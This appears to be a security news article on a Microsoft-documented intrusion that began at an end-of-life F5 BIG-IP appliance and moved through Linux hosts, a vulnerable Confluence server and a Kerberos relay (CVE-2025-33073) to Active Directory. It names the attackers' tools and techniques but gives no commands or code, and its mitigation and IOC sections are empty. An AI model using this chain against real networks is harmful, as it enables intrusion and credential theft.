Hackers Exploit End-of-Life F5 BIG-IP Appliance to Gain SSH Access and Pivot Into Enterprise Linux Networks

Hackers Exploit End-of-Life F5 BIG-IP Appliance to Gain SSH Access and Pivot Into Enterprise Linux Networks

Microsoft’s Defender Security Research Team has documented a sophisticated multi-stage intrusion in which threat actors exploited an internet-facing F5 BIG-IP edge appliance as the entry point for a widespread, identity-focused attack that ultimately reached Active Directory.

The attack reflects a growing and dangerous trend: firewalls, VPN gateways, and load balancers — devices traditionally deployed as security perimeters — are increasingly being repurposed as initial access vectors. Because these edge appliances are externally exposed, lightly monitored, and deeply trusted inside enterprise environments, a single breach can give attackers a durable, low-visibility foothold along with access to stored credentials, certificates, and identity integrations.

Initial Access: Exploiting an End-of-Life F5 BIG-IP Appliance

The threat actor established SSH access to the first internal Linux host originating from a network device identified as an F5 BIG-IP load balancer. Device inventory confirmed the source as an Azure-hosted BIG-IP Virtual Edition running version 15.1.201000 — a build commonly deployed via Azure ARM templates and Terraform modules — that reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of exploitation.

Discovery and Reconnaissance

Once inside the Linux environment, the attacker conducted aggressive internal reconnaissance. Shell scripts were used to perform lateral Nmap scans of the internal subnet to enumerate active hosts, followed by deeper vertical scans to identify open services. The tool GoWitness was then used via a SOCKS5 proxy to capture screenshots and fingerprint exposed HTTP/HTTPS services.

Upon discovering a Windows server, the attacker attempted NTLM-based lateral movement using a suite of open-source tools including enum4linux, netexec, smbclient, rpcclient, timeroast, ldapsearch, kerbrute, and responder. These initial attempts failed. The attacker then pulled a custom scanning tool — labeled HackTool:Linux/MalPack.B by Microsoft — from a command-and-control (C2) server using wget, which was used to probe the organization’s web applications and mobile services including Firebase and GCM to enumerate access controls.

Pivoting to Internal Confluence Server

Reconnaissance revealed an internal Atlassian Confluence server with unpatched vulnerabilities susceptible to remote code execution. While Confluence was not internet-facing, it was reachable from the attacker’s internal foothold. Since real-time protection on most hosts blocked payload drops, the attacker pivoted tactics — standing up an anonymous FTP server using Python on a Linux ephemeral host to facilitate data transfers.

After compromising Confluence, the attackers exfiltrated credentials from configuration files and used them against the Windows infrastructure.

Attack Chain at a Glance

Kerberos Relay and Domain Compromise

With credentials obtained from Confluence, the attack escalated into a Kerberos relay attack exploiting CVE-2025-33073 — which removes the prerequisite of admin access to achieve authenticated remote code execution as SYSTEM on any domain-joined machine without SMB signing enforced, requiring only network access and any valid domain credential. The attacker used netexec in conjunction with PetitPotam coercion and DNS manipulation tools to target the domain controller.

Detection and Defender Response

Microsoft Defender for Endpoint detected the malicious activity and blocked the ELF payload on the one Confluence host where real-time protection was enabled. The incident underscores the critical importance of deploying endpoint protection consistently across all Linux hosts, not just Windows systems.

Microsoft’s Mitigation Recommendations

Indicators of Compromise (IOC)